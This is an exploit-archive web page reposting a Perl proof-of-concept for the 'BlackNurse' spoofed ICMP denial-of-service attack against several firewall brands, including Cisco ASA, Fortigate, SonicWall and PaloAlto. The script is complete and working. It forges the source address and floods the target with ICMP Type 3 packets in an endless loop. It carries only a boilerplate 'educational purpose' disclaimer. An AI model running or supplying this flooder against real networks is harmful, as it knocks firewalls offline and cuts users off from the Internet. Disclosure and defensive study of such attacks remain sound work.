首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BlackNurse Spoofed ICMP Denial Of Service Proof Of Concept
来源:https://www.ethical-hacker.org/ 作者:Donev 发布时间:2016-11-16  
#!/usr/bin/perl
#
# Cisco ASA 5515/5525/5550/5515-X | Fotinet | 
# Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | 
# Zyxel Zywall USG50 Spoofed "BlackNurse" DoS PoC
#
#  Copyright 2016 (c) Todor Donev
#  Varna, Bulgaria
#  todor.donev@gmail.com
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  http://pastebin.com/u/hackerscommunity 
#
# 
#  Description:
#  Blacknurse is a low bandwidth ICMP attack that is capable of doing denial 
#  of service to well known firewalls. Most ICMP attacks that we see are based 
#  on ICMP Type 8 Code 0 also called a ping flood attack. BlackNurse is based 
#  on ICMP with Type 3 Code 3 packets. We know that when a user has allowed ICMP 
#  Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly 
#  effective even at low bandwidth. Low bandwidth is in this case around 15-18 
#  Mbit/s. This is to achieve the volume of packets needed which is around 40 to 
#  50K packets per second. It does not matter if you have a 1 Gbit/s Internet 
#  connection. The impact we see on different firewalls is typically high CPU 
#  loads. When an attack is ongoing, users from the LAN side will no longer be 
#  able to send/receive traffic to/from the Internet. All firewalls we have seen 
#  recover when the attack stops.
#
#  Disclaimer:
#  This or previous program is for Educational purpose ONLY. Do not 
#  use it without permission. The usual disclaimer applies, especially 
#  the fact that Todor Donev is not liable for any damages caused by 
#  direct or indirect use of the information or functionality provided 
#  by these programs. The author or any Internet provider bears NO 
#  responsibility for content or misuse of these programs or any 
#  derivatives thereof. By using these programs you accept the fact
#  that any damage (dataloss, system crash, system compromise, etc.) 
#  caused by the use of these programs is not Todor Donev's 
#  responsibility.
#
#  Use at your own risk and educational
#  purpose ONLY!
#
#  Thanks to Maya (Maiya|Mia) Hristova and all my friends 
#  that support me.
#
#
  
use Net::RawIP;

print "[ Cisco ASA 5515/5525/5550/5515-X | Fotinet | Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | Zyxel Zywall USG50 Spoofed \"BlackNurse\" DoS PoC\n";
print "[ ======\n";
print "[ Usg: ___FCKpd___0 <spoofed address> <target>\n";
print "[ Example: perl ___FCKpd___0 133.71.33.7 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $spoof          = $ARGV[0];
my $target         = $ARGV[1];

my $sock =  new Net::RawIP({ icmp => {} }) or die;

print "[ Sending crafted packets..\n";
while () {
                $sock->set({  ip =>  { saddr  => $spoof, daddr => $target},
                              icmp =>  { type => 3, code => 3} });
                $sock->send;
                $sock->set({  icmp => { type=>3, code => 0}});
                $sock->send;
                $sock->set({  icmp => { type=>3, code => 1}});
       	       	$sock->send;
                $sock->set({  icmp => { type=>3, code => 2}});
       	       	$sock->send;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Trend Micro Smart Protection S
·Easy Internet Sharing Proxy Se
·phpWebAdmin 1.0 SQL Injection
·Microsoft Edge 11.0.10240.1638
·txtforum 1.0.4 Remote Command
·Linux Kernel (Ubuntu / RedHat)
·Linux Kernel 4.4 (Ubuntu 16.04
·Microsoft Windows - VHDMP Arbi
·Disk Pulse Enterprise 9.0.34 -
·Microsoft Windows - VHDMP ZwDe
·Microsoft Internet Explorer 11
·Microsoft Windows - VHDMP Arbi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved